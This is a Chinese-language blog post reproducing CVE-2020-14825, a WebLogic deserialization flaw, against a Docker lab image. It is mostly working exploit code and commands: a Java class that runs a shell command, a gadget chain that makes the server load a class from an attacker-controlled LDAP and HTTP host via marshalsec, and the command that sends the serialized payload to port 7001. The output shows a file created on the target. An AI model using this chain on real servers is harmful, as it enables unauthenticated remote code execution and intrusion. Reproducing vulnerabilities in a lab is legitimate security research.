CVE-2020-14825：Weblogic反序列化漏洞复现

全程无图,全靠编
参考:https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247486336&idx=1&sn=2a054ededbc855622fe2ac6c8906aae0&chksm=90392d70a74ea46635bef3cd4fc414cef87d16a1875ccb690f6eadb4304337e0d2b4772a2659&scene=126&sessionid=1603933645&key=7f54b3443b683033cfec95eb0ee90ba94d11eb5b3aab434add3c872b2a4b62efc0d19a1a2112aff162ea26e926805ccb6a713c43c9231e0ccf46d1d9f3433404132f9576fad66837df791bbb8b677919071577b6b30ef4bf9968dc85894ef22549430c09ab65462d773aa102320070fc261d8097abf7cb288e32cf563c0a0eea&ascene=1&uin=MjY5MDA0ODIwMA%3D%3D&devicetype=Windows+7+x64&version=6300002f&lang=zh_CN&exportkey=AUhACr%2BPzDbMNVNOHwvyEHQ%3D&pass_ticket=wqlCFAhHIF61mFoQzf8xbUdSBksKioTnQMGtR5C7T547%2BtC62Wwuxak%2Bz21orxmh&wx_header=0

环境

docker pull ismaleiva90/weblogic12
docker images
docker run -p7001:7001 84795663769d

POC

public class exp{
    // POC open calc
    public exp(){
        try {
            Runtime.getRuntime().exec("touch /tmp/ok14825.txt");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        exp e = new exp();
    }
}

找这些jar包真费劲

import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.util.comparator.ExtractorComparator;
import oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor;
import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;
import ysoserial.payloads.util.Reflections;

import java.io.*;
import java.util.PriorityQueue;

public class CVE_2020_14825 {
    public static void main(String[] args) throws Exception {
        MethodAttributeAccessor accessor = new MethodAttributeAccessor();
        accessor.setAttributeName("Timeline Sec");
        accessor.setIsWriteOnly(true);
        accessor.setGetMethodName("getDatabaseMetaData");

        LockVersionExtractor extractor = new LockVersionExtractor(accessor,"");

        JdbcRowSetImpl jdbcRowSet = Reflections.createWithoutConstructor(com.sun.rowset.JdbcRowSetImpl.class);
        jdbcRowSet.setDataSourceName("ldap://192.168.8.142:1389/#exp");

        PriorityQueue<Object> queue = new PriorityQueue(2, new ExtractorComparator(extractor));
        Reflections.setFieldValue(queue,"size",2);

        Object[] queueArray = (Object[])((Object[]) Reflections.getFieldValue(queue, "queue"));
        queueArray[0] = jdbcRowSet;

        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(new File("cve_2020_14825.ser")));
        out.writeObject(queue);
        out.flush();
        out.close();
//        readObject();
    }

    public static void readObject() {
        FileInputStream fis = null;
        try {
            fis = new FileInputStream("cve_2020_14825.ser");
            ObjectInputStream ois = new ObjectInputStream(fis);
            ois.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

过程

编译exp.java
放在python -m SimpleHTTPServer 80下
开启ladp服务

java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://192.168.8.142/#exp 1389

go

python weblogic_poc.py -u 192.168.8.142 -p 7001 -f cve_2020_14825.ser

结果

docker exec -i -t 84795663769d /bin/bash
[oracle@c6836c2a0308 base_domain]$ ls /tmp 
hsperfdata_oracle  ok14825.txt  wlstTemporacle

补一张图